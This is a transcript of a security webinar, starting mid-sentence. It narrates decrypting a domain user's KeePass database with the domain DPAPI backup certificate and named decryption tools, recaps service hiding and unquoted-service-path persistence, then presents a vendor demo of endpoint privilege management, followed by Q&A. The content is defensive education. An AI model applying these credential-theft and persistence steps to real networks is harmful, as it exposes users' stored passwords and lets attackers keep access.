encrypted data, like KeePass. And what's the point? The point is that if the user relies KeePass on the operating system's logon, yeah, then basically you are able to get access to that particular KDBX file because it becomes a classic data protection API blob. Yeah. So if we get into the KDBX right now, yeah. So just to show you, okay, and I will try to enter password that's secure, which will not work out. Okay, and it fails. Okay, so how can I get access to this guy? hmm So first we need to check how that KeePass database is protected. And the KeePass database, that's actually classic, it's protected by the protected user key bin, which you can find in the user's profile. Just to prove the point, we can get into the C users, Freddy Krueger, update a roaming, KeePass, and then this is the place where there's a protected user key bin. And this is the key that encrypts the KeePass database. So the question of the universe is who actually encrypts that protected user key? And answer is master key of the user that is encrypted by the certificate from the domain. So this is quite a lot of encryption, but this is how we get it. So in other words, in order to be able to violate the security of the infrastructure, of course, you need to get that certificate, and that certificate is stored in a domain controller. So either you have a domain admin's privileges or you are able to enforce the replication of the domain controller, which is also one of the attacks. But for that, you need to have a permission of replicating directory changes and replicating directory changes also. No matter what, there is no rocket science. You have to be somewhat privileged. And that protected user key bin, it is actually a data protection API blob, which we can recognize by this header here. It looks a little bit like an kind of like exe kind of thing. Yeah, so this is very characteristic for the DP API blob. Okay, so once we get it, and we are almost done, this protected user key bin, we will need to decrypt it. And we're going to decrypt it by the decrypted master key of the user by using this certificate. So this is just to show, because it's a quite a long process. This is to show you what is the possibility that we're going to have by that certificate. So let's move forward. How we're going to do it? So here we got analysis, and we got master key of a Freddy. So that's going to be this value. But question is, how is it to access KeePass of Freddy without really being Freddy? Yeah, so here we go. We're gonna run over there the command prompt. Yeah, let's do it. And let's go to tools. And over there, we're gonna do CQ master key decrypt. So that's the tool that you can use to decrypt the master key of Freddy, but we already have it. But another one over there, it's gonna be the CQ DPAPI blob decryptor. And this one is super short. We need for that CQDP blob decryptor master key. Okay, so we have it. So let's just put it master. That's this guy. Then we got an entropy, which we don't have yet. Blob C analysis protected user key bin. Lovely. And then entropy. Let's just use an entropy. And then this is funny because KeePass actually uses entropy that is constant. So I'm going to just display entropy in a separate console. CQ, and this is the KeePass DB decryptor, and the entropy of KeePass looks like this. So I'm accessing the Freddy's KeePass thanks to the certificate that I can get from the domain. Yeah, so here we go. Entropy, boom. And then we got it. So this key, it's the decrypted key that decrypts the KeePass database. So we are almost there. So stay with me. So here we got the KeePass DB decryptor, and then we do /k for key, that's this one, and then we do F for file, and then we're going to do analysis, and then CQ base that we did not have access to. Boom. And this re-encrypts as KeePass database. So let's take this guy, and let's enter it. Enter. And right now, it's going to be a little bit of a different story because this will actually open KeePass. So let's see whether this is not, we will need to close it. So to open the new one, yeah? So let's just do it again. So this will open KeePass. This is our file and secure. So we are just, as you can see, accessing the KeePass already because of the certificate that we managed to get from the domain. Yeah. So this is the data protection API result. So it's also persistence and it also allows you to always do it because once you get that certificate, you are violating the security of the infrastructure forever. So that's just to give you the flavor of another way of persistence, but this time, this in this way, by having, of course, first the privilege access. So hopefully this is interesting, guys, and hopefully you enjoyed my part. And of course, in order to get into the summary, we talked about the permissions, and in order to understand them, how we are able to hide different components through the change permissions in the operating system. Don't forget the G permissions, generic permissions. Don't forget also the granular permissions, so read data that is not visible at the first moment, and also that deny and allow are on the same level. We talked about services, the possibility of hiding them, which proves the point that we always have to have at least two tools checking for the same thing but in a different way. And we also played with services, changing the executable, but also with the unquoted service path. And at the end, we managed to play with a domain persistence, proving you that if we have access to that DB API certificate, we are able also to get access to the key pass of the user. If, of course, user relies key pass on the Windows logon, not on the separate password, then it's different story and then it's okay. So please, of course, as always, download the tools that we have used during this presentation. So that's the resourcessecureacademy.com/tools. And hopefully everything was clear. Please let me know what you think, whether you got some questions. I'll be happy to address them also during this webinar. And then now, of course, it's time. Let me do stop screen sharing for the Beyond Trust part. So here we go. Josh, stage is yours.
Perfect. Thank you so much, Paul. I really appreciate it as always. It's always fascinating to watch you work and slightly terrifying at the same time. So
Always.
I'm going to
Thanks a
go
lot.
ahead and share my screen out, maybe steal the show a little bit. All right. And team, we're going to close things out. I only got a couple of slides. We're going to launch right into a quick demo just to kind of talk about endpoint privilege management, and then we'll close things out with some questions as always. So stay tuned if you have any questions that you're looking to get answered. And I did just share my screen out, so that should be up, and you guys should be able to hear me now. And I'm going to launch right into this. Now, we're going to be talking about specifically endpoint privilege management today at the back end of kind of Paula's webinar here. We also have different products for things like password rotation, privilege remote access, Active Directory bridging into Unix systems, but we are going to talk about privilege management on the endpoints. Now, how does this kind of relate to what we've been talking about so far in terms of Paula's presentation? And as she has demonstrated, the risk of cyber threats is always going to be on the rise. We're seeing things like 300,000 plus new variants of malware daily these days. And in terms of just, why this is so relevant, organizations are always experiencing breaches. Most organizations have. Now, the issue is that some of them don't even know that they've been breached, and it takes a lot of time to not only identify that, but to contain those breaches once you have. And these things can be very costly, with average costs seeing around $1 million per breach. This is definitely not something that you want to have affecting your organization. And the majority of those breaches do involve compromised credentials. So these are just some of the things that we want to look at, that we want to pay attention to when we're trying to not only define that threat landscape, but also how we can determine the best practices for putting up countermeasures to make sure that we're more secure, to reduce that threat landscape. Now, this is where one particular item comes into play. A lot of this, can be mitigated right out of the gate simply by removing admin rights. A simple, well, maybe not so simple task, but a single item, a single security task can be used to really help reduce that attack surface across the board. So the question kind of becomes is why haven't organizations kind of taken this step? What are some of the challenges that they see when they go down this road? It can be seen that it could reduce the end user productivity. The users aren't able to do a lot of things they were before when they had admin rights. Maybe it's just applications. Maybe they're debugging applications. There's a lot of different things that could actually have a negative impact on your users. Now, it could also be that it's just easier to give them the rights they need in the moment that they need it. It's quick, it's easy. We just simply give it to them. They do what they need to do. But again, what about the visibility? Are they really just doing that one task that they needed, or are they going beyond that? How do we get that visibility? It could also be seen that the service desk workload is going to drastically increase. We're going to get more tickets. Our IT desk is just going to be inundated with all of these repetitive tasks of installing printer drivers and just putting their admin credentials in to do this or that task day in and day out. And it could just see that workload drastically increase. And maybe it's just seen as a complex implementation. We don't want to or have the time or the resources to actually take a stab at something like this. So, how can we kind of rise above all of these challenges? And that is where endpoint privilege management comes into place. We want this to be very quick and very easy. We want you to remove admin rights without hindering that end user productivity. That is the goal at the end of the day. Now, we will be able to cover all of your different endpoints, whether those are Mac, Unix and Linux, Windows based machines, servers as well. All of these are fair game for the product itself. And the three main things that we're looking to achieve here with a product like this is to one, to remove admin privileges. This is going to reduce your attack surface. It also, along the way, will help you achieve compliance with anything you're looking to meet, whether those are being handed to you, being defined internally. We also will provide you with application controls. What do you want to allow in your environment? What do you want your users to run? What do you know that's good? What do you not want running in the environment? What do you want to deny? What are the things that you know to be bad that we can just go and block right out of the gate? But also, we have trusted application protection, which is meant to protect what we call content handlers. So those are going to be your web browsers, your PDF viewers, your Microsoft Office suite, things that we're constantly using, but they're also constantly targeted as applications that can be abused maliciously. That would end up wreaking havoc across your endpoints. But again, we still need to use those apps. We use them on a day-to-day basis. Everybody that's on this call is using one of them as we speak, if not multiple. Now, one of the major things that we want to do is we want this to be quick. We want this to be efficient. Now, a lot of the traditional solutions that you see in the space, you have to kind of sit in discovery mode, identify what the users are doing, build that policy up. And then once you've kind of feel that you've created a policy worthy of your environment, worthy of your users, then you roll that out to help protect the estate. We want to shorten that time frame altogether. We want the protection of the estate to be done right out of the box with our quick start. We're going to give you a bunch of things that are predefined in a template that's ready to go from day one. You're going to be able to start analyzing the behavior of your users right when you deploy this, and you can actually start refining that policy within days instead of months. So it's a much quicker ROI in terms of implementing a solution like this. We can get you going from zero to actually removing admin rights across your entire state very quickly and with very little user interruption. Now, some of the other achievements that you want to look for are going to be things like achieving compliance, some operational efficiency. Every organization knows how much every single service desk ticket costs them. Amplify that by the amount of tickets you're getting once you remove admin rights. We want to reduce that cost and we want to make things much simpler, give the users the empowerment that they need in order to launch the applications when they need them in that moment. Right? While also reducing threats, whether those are internal threats or external threats, we want to make sure that we have best security practices in place for what applications can be used, which ones can't, and measures so that whenever we see something net new, we have a clean approach for giving the end user an option for getting that access in that moment. Now, I'm going to go ahead and switch into the demo. So I'm going to stop sharing my screen and we're going to jump right over into my lab. We'll give that a second while it's coming up. Okay. And now you should be looking at a Windows 10 box. So This is my demo box for today, guys. This is going to be a quick and clean, easy demonstration. If you guys want something much more in depth around the product, a full product demonstration, just reach out to us. We'll sync you up with your nearest account rep and we'll give you that demo where we can go into a lot more detail about what's actually going on here. But just to kind of set the stage a little bit, we're going to be messing with Stan, my standard user today. And Stan is or has no admin rights whatsoever. So whenever he tries to go and install an application, he's going to get hit with that UAC. This is where, again, if your users don't have admin rights, you may give them these rights in this moment so that they can just launch this themselves. They may have secondary accounts that they're using to elevate this, or they have different third party tools that they can use, like ours, to kind of perform that elevation or give them that in that moment. Now, it really doesn't matter if they're apps that are trying to be installed or if you guys are being pulled into the machine so that you could simply make some changes to some of the network functionalities or anything like that. Anytime you see that little shield with the UAC, you are going to need admin rights in order to do something. Now, it could also be about protecting the endpoint, but also just protecting the users about things that you don't want running on the endpoint. Now, Dropbox is a really good example where if you don't have admin rights and you go to run this is an offline installer, you'll say, hey, do you have admin rights? Do you want to run this? Yes or no? But if it recognizes that you don't have them, little if statement says, if you don't have them, we can go ahead and install it without admin privileges. We're just going to put it in a different directory where we don't need them. So we just circumvented your least privilege initiative and gave them the ability to install an application you probably don't want. So how can we make sure that we control child processes? Well, not just the parent process, but whatever else it touches. Does that process also need rights? Does it not need rights? Can we give it the rights it needs? Can we remove it and just outright block it? These are all different options that you have available to you with a product in order to kind of control what the user can do. Now, the other thing is going to be malicious threats against the endpoint. Now, whether that's just going to be you have the sales rep, he finally got that Excel spreadsheet with all their stats and how they're doing for the quarter, but maybe they didn't really look at who sent it to them and they just go ahead and open up that Excel document. It's got a payload embedded in a macro in it, which is going to go ahead and launch PowerShell and just encrypt all your files. And now the sales rep's pretty upset. He doesn't know what to do. And he has to go and have a pretty uncomfortable conversation with security. Security swoops in. They say, hey, no problem. I got the Mr. Clean app here. We'll just restore your backup real quick. But, please read your emails. We're also going to drop you in the security awareness training just to make sure you stop clicking on things. So these are the different ways that, even when a user doesn't have admin rights on the endpoint, things can still happen. Malicious activity can still occur. So we want to make sure that we put protections in place to stop that in its tracks. Now, endpoint privilege management, we are going to go ahead and turn these things on and show you how we can just easily move through these types of situations with the product, what we want to allow, what we want to block, and how can we control against those types of threats and child processes that maybe we do or don't want running on the endpoint. So just for starters, the template that I was talking about before that quick start is something that you can just pull down. We have a quick start for Windows. We have one for Mac as well. The same methodology that we use is going to be across both Windows and Mac in terms of how we go about managing these solutions. And the other one I was talking about is TAP, Trusted Application Protection. These are templates that come with the solution out of the box. You simply have to create them and merge them into your policy. Now, once you have those, you're going to go ahead and turn things on. And now, where the user didn't have the ability to run these applications before, we have that VPN solution that we just rolled out. We want our users who are standard users to be able to install it. Well, I've allowed this application. They can just run, they can install this, do whatever it is that they need to do, no questions asked. Or if it's something net new, we don't know what it is, we haven't seen it before, and we want to kind of prompt the user to kind of give them an idea. Do you want to do this? Do you not want to do this? That's where our messaging comes into place. Now we will suppress the UAC prompt that is normally there and put our different message options in its stead. And the different work styles, as we call them, or user experiences, will determine what that interaction looks like. Now, I'm in a high flexibility work style right now, meaning that I can just do whatever it is that I need to do. I have the same type of ability, if you will, as if I was still an admin, but I'm running as a standard user. So if I want to install this, I simply click yes, and now I can install the application. But I have a variety of different work styles that I can use as well to give you different user experiences. If I want to ask a question, get a little more information before I let you use this, well, I can go ahead and turn on the medium flexibility work style. That same application is just asking a different type of question before I allow you to use it. Before it was a yes or no. Hey, this is an unknown application. Do you want to use this? Yes or no. Now it's an unknown application. Please tell me why you're using this before I let you use it. And you can have open-ended responses, a drop down like you see here where they can select it. But now you have more of a justification, more of a reason as to what this is and why the end user needs it. And then we'll let them in. We could also put this in more of an approval process. Now, whether you want to utilize a ticketing system or what's built into the tool itself in our low flexibility, which is a challenge response code, we can simply come in here, we could turn this on, and then you're going to have an exchange that you can use. Hey, here's a code. If you want access to this, you have to give that to the right person. They exchange that, they give you a response code, and then you'll be able to run the application itself. So we have tools built in that can essentially determine what the end user has to do, whether they're empowered themselves to just get access to the application or whether they have to go out and ask permission. It's all built in. Now, some of the other things that we can do to help protect against the endpoint is going to be things like this. Now, if you have developers or people that are constantly using things or debugging things, we can always get into the whole conversation around SE debug privilege and things like that. But having access to be able to debug systems, whether they're run by other users, by a system itself, there's a lot of different things that you can do. Now, I've turned off the tool itself, and what we can see in here is that if you were to open up Visual Studio, there's a lot of different ways that this could potentially be abused. Now, for instance, if you go into File and you go into Open, you can literally open up a PowerShell window through Visual Studio, and depending on the rights that Visual Studio has, if you were to run that as an admin, you would now have a PowerShell that is run by admin, and you could essentially open up Registry Edit or anything else, run a command to elevate yourself back up to an administrator. There's a lot of different things that you can do with an elevated PowerShell terminal, but we want to make sure that these types of extensions of that privilege, whether the Visual Studio was given privilege initially and then that extended into PowerShell, we want to reduce that. We want to control where that privilege goes. So just show you how dangerous that could be if I was to say open up Visual Studio as an administrator. We'll actually go into Reddit and we will make a new key. And while that's cooking, we're also going to show you how we can control the privilege being extended to child processes. So now open this up. As you can see in the top right hand corner, Visual Studio is running as an admin. If I go back in here and I open up my PowerShell window, right, you will see that I'm running as no longer Stan, but as Adam, my administrator. If I open up Registry, I will be able to actually create new strings in here. I have the rights and the privilege in order to do that. But if we go ahead and turn our tool on, we can make sure that we are controlling where that privilege actually goes. And we can do so within the policy. So let's go back in, let's turn everything back on. And I'm going to turn tap on as well. And we'll see how we can start protecting against certain things. So now, when we open up Visual Studio, we are going to inject the privileges that it needs in order to run directly into the process. Now, this is running as an administrative again, but if I go through that same sequence and I open up PowerShell again, now I'm running as Stan. I no longer have those rights being extended into PowerShell, and I'm controlling what we can and cannot do from there, because I now have more control over where the privilege exists, what we're actually giving it to. And that is the true value of the product. We're no longer giving access to the user. The user always remains a standard user. We are giving access to the thing, the task in question. And we do that through an injection. So lots of cool stuff that we can do in here. But again, through that relationship between the parent-child process, we can also see how we can control things like Dropbox, where we don't want Dropbox running on the endpoint. We're going to block that outright. But we also want to make sure that that secondary process that it called to that said, hey, I can install this anyways, that's going to be blocked as well. So just different ways of maintaining where that privilege goes. And tap is also going to come into play where they go ahead and they open up that Excel document again with that macro embedded into it, except now it sees Excel as a parent process and it sees it trying to open up PowerShell and it'll block that. Now I'm not blocking PowerShell. I'm simply blocking how it was called. I can still run PowerShell if I could spell it correctly, as I normally would, and I'm still running as a standard user. So it's really about what processes are running, what privilege do they get, and where can we extend that privilege to once they have it, whether we're allowing it and allowing any other child processes to run, or blocking it and blocking every other child process. So there's lots of different ways that we can kind of manage and control that. And with that, I know we got about 3 minutes left to the top of the hour. So what I'm going to do is I'm going to stop sharing my screen and we can open it up to any and all questions that you may have. And once again, if you want much deeper demo on the product itself, please reach out to Beyond Trust and we'll get you in contact with your sales reps. This is more of just a quick and brief taste of the product, but we will go ahead and open it up for questions. So let me go ahead and stop sharing.
Thanks, Josh.
No problem.
And I think Paula answered most of the questions in the chat, but I did see
Oh,
one come in
fantastic.
that we didn't get to. Paula, can you tell us what is the first step companies should take in 2023 to heighten their security?
Haha, the first step. So there are many steps really, but I think one of the first step is going to be to review our monitoring capability and our capability to respond to an incident. So what kind of possibilities we got in order to react quickly of what's going on. Yeah. So I think that'll be one of the priorities because we saw in 2022 so many attacks that were not reacted to appropriately, and if that reaction was just good and faster, then the impact could have been smaller. So that's why I would say that.
Thank you. And then, Josh, this one sounds like it'd be for you. How does the product work with the remote workforce?
Yeah, no, it's a great question. So the product is actually going to be installed locally on the machine, and the policy will be locally as well. So what that means is that even if it doesn't have a network connection, it's not in the VPN, it doesn't have that connection back to the primary console wherever you're hosting and managing that policy, it'll always enforce the last one that it received. So as long as you have a good license, you're always going to be protected, and that'll never be an issue.
Great, thank you. And I'm definitely trying to be mindful of time. So if there is any further questions, please reach out to us. And also, after hearing Paula and Josh, if you are interested in being contacted, the poll is still available, so you can answer there or respond to the survey, and we'll get in contact with you. Again, be on the lookout for that post-webinar email. We'll be sending that out within about 2 business days, which will include a lot of resources. So make sure that you're on the lookout for that. And I also want to thank our speakers. Thank you, Josh. Thank you, Paula, so much. It's always such a pleasure to work with you both. And thank you to everyone who joined us live today. Have a great day, and we'll see you next time.
Bye, everyone. Pleasure.
Thanks so much. Always a pleasure.